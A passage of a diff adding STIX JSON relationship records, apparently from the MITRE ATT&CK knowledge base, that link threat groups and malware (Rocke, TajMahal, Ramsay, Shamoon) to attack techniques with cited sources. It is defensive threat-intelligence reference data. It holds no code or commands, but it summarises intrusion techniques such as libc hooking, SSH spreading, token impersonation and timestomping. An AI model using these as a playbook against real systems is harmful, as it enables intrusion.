+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used SSH private keys on the infected machine to spread its coinminer throughout a network.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--de8fefef-bfe7-4720-a443-66713a47b439",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.241Z",
+ "created": "2020-06-11T19:52:07.241Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--2db31dcd-54da-405d-acef-b9129b816ed6",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has spread its coinminer via SSH.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--fa69ac7a-8031-4fac-91e2-65e90f378cd1",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.273Z",
+ "created": "2020-06-11T19:52:07.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has compiled malware, delivered to victims as .c files, with the GNU Compiler Collection (GCC).(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--47440b3d-e6ef-4f7d-b732-453d1684424a",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.693Z",
+ "created": "2020-06-11T19:52:07.283Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified UPX headers after packing files to break unpackers.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--277971c7-d42e-497f-8df4-be5b4bc094f8",
+ "type": "relationship",
+ "modified": "2020-06-15T19:59:06.682Z",
+ "created": "2020-06-11T19:52:07.290Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--521c66b9-fe52-4c2b-bc32-8ed3d98c7a71",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.318Z",
+ "created": "2020-06-11T19:52:07.318Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--47b95300-a51c-4d91-9bbe-e40956df2081",
+ "type": "relationship",
+ "modified": "2020-06-16T13:34:56.503Z",
+ "created": "2020-06-11T19:52:07.337Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used shell scripts which download mining executables and saves them with the filename \"java\".(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--ff438715-ffa8-4fa2-a69e-7126dd60bfb3",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.350Z",
+ "created": "2020-06-11T19:52:07.350Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has extracted tar.gz files after downloading them from a C2 server.(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--c8fdab57-1e10-4f66-a1de-59a876c99ab1",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.352Z",
+ "created": "2020-06-11T19:52:07.352Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has used Pastebin, Gitee, and GitLab for Command and Control.(Citation: Anomali Rocke March 2019)(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--29552ed5-ecfd-4a97-a6c9-d6da25181e1a",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.355Z",
+ "created": "2020-06-11T19:52:07.355Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6",
+ "external_references": [
+ {
+ "source_name": "Talos Rocke August 2018",
+ "url": "https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html",
+ "description": "Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) issued wget requests from infected systems to the C2.(Citation: Talos Rocke August 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--37327da8-efd3-48c0-9f91-38f384f8579e",
+ "type": "relationship",
+ "modified": "2020-06-11T19:52:07.391Z",
+ "created": "2020-06-11T19:52:07.391Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to capture webcam video.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--15c3f3a3-03c9-4591-a2d2-64b5eafbd4a7",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.412Z",
+ "created": "2020-06-11T20:08:11.412Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to determine local time on a compromised host.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5c160f0c-1c12-4ab0-bd6e-a30f8d5bc168",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.417Z",
+ "created": "2020-06-11T20:08:11.417Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--0a5231ec-41af-4a35-83d0-6bdf11f28c65",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has the ability to inject the LoadLibrary call template DLL into running processes.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--b4ef6c6e-d7aa-451a-b071-faf0138cfbff",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.419Z",
+ "created": "2020-06-11T20:08:11.419Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Kaspersky TajMahal April 2019",
+ "url": "https://securelist.com/project-tajmahal/90240/",
+ "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019."
+ }
+ ],
+ "description": "[TajMahal](https://attack.mitre.org/software/S0467) has used an encrypted Virtual File System to store plugins.(Citation: Kaspersky TajMahal April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f43dedfa-261d-41af-bb74-e1f2eff5cbae",
+ "type": "relationship",
+ "modified": "2020-06-11T20:08:11.422Z",
+ "created": "2020-06-11T20:08:11.422Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8",
+ "target_ref": "attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c",
+ "relationship_type": "mitigates",
+ "description": "Routinely check user permissions to ensure only the expected users have the capability to create new instances.",
+ "id": "relationship--ac440832-cb04-409e-87fa-558097a898b6",
+ "type": "relationship",
+ "modified": "2020-06-18T11:45:36.774Z",
+ "created": "2020-06-12T12:24:14.131Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use ImprovedReflectiveDLLInjection to deploy components.(Citation: Eset Ramsay May 2020) ",
+ "relationship_type": "uses",
+ "id": "relationship--d10e82b8-7f30-4845-af05-44ac3287bf70",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.794Z",
+ "created": "2020-06-12T16:15:04.825Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use UACMe for privilege escalation.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a024097d-78f0-4439-a239-571d361335f5",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.795Z",
+ "created": "2020-06-12T16:15:04.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can extract its agent from the body of a malicious document.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ed6d663f-510b-4702-9c2a-ef40cc4d88c7",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.792Z",
+ "created": "2020-06-12T16:15:04.841Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can store collected documents in a custom container after encrypting and compressing them using RC4 and WinRAR.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--71abba24-84a2-449d-811a-ba006382d723",
+ "type": "relationship",
+ "modified": "2020-06-16T23:17:21.069Z",
+ "created": "2020-06-12T16:15:04.912Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a JPG image file.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--a38af2cc-ccc7-41aa-936c-fe15a13ddafa",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.914Z",
+ "created": "2020-06-12T16:15:04.914Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect data from removable media and stage it for exfiltration.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f86c19e6-39a1-423c-8db2-a8258ac51bd6",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.917Z",
+ "created": "2020-06-12T16:15:04.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can collect data from network drives and stage it for exfiltration.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--6c692a16-22b8-42bb-9a6b-3c25a2714cf5",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:04.920Z",
+ "created": "2020-06-12T16:15:04.920Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d",
+ "external_references": [
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) can impersonate tokens using LogonUser, ImpersonateLoggedOnUser, and ImpersonateNamedPipeClient.(Citation: McAfee Shamoon December 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--755bc45a-9048-4f58-b405-2ea8329328a1",
+ "type": "relationship",
+ "modified": "2020-06-15T14:13:40.686Z",
+ "created": "2020-06-15T14:13:40.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "external_references": [
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) will reboot the infected system once the wiping functionality has been completed.(Citation: Unit 42 Shamoon3 2018)(Citation: McAfee Shamoon December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--d2ff2c76-04ed-41c4-bd35-75f7cf823aee",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.868Z",
+ "created": "2020-06-15T14:22:33.868Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) decrypts ciphertext using an XOR cipher and a base64-encoded string.(Citation: Unit 42 Shamoon3 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8fe32611-4206-4bef-9698-dbcefde08090",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.876Z",
+ "created": "2020-06-15T14:22:33.876Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
+ "target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
+ "external_references": [
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) can change the modified time for files to evade forensic detection.(Citation: McAfee Shamoon December 2018)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ebf68107-a2b8-4ff1-916f-e1861a20914a",
+ "type": "relationship",
+ "modified": "2020-06-15T14:22:33.878Z",
+ "created": "2020-06-15T14:22:33.878Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
+ "external_references": [
+ {
+ "source_name": "Forbes Dyre May 2017",
+ "url": "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a",
+ "description": "Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "CrowdStrike Wizard Spider March 2019",
+ "url": "https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/",
+ "description": "Feeley, B. and Stone-Gross, B. (2019, March 20). New Evidence Proves Ongoing WIZARD SPIDER / LUNAR SPIDER Collaboration. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Malwarebytes TrickBot Sep 2019",
+ "url": "https://blog.malwarebytes.com/trojans/2019/09/trickbot-adds-new-trick-to-its-arsenal-tampering-with-trusted-texts/",
+ "description": "Umawing, J. (2019, September 3). TrickBot adds new trick to its arsenal: tampering with trusted texts. Retrieved June 15, 2020."
+ }
+ ],
+ "description": "(Citation: Forbes Dyre May 2017)(Citation: CrowdStrike Wizard Spider March 2019)(Citation: Malwarebytes TrickBot Sep 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--61805115-3044-4ed7-91f4-074b2a073e02",
+ "type": "relationship",
+ "modified": "2020-06-16T19:04:09.745Z",
+ "created": "2020-06-15T19:06:44.790Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--63c2a130-8a5b-452f-ad96-07cf0af12ffe",
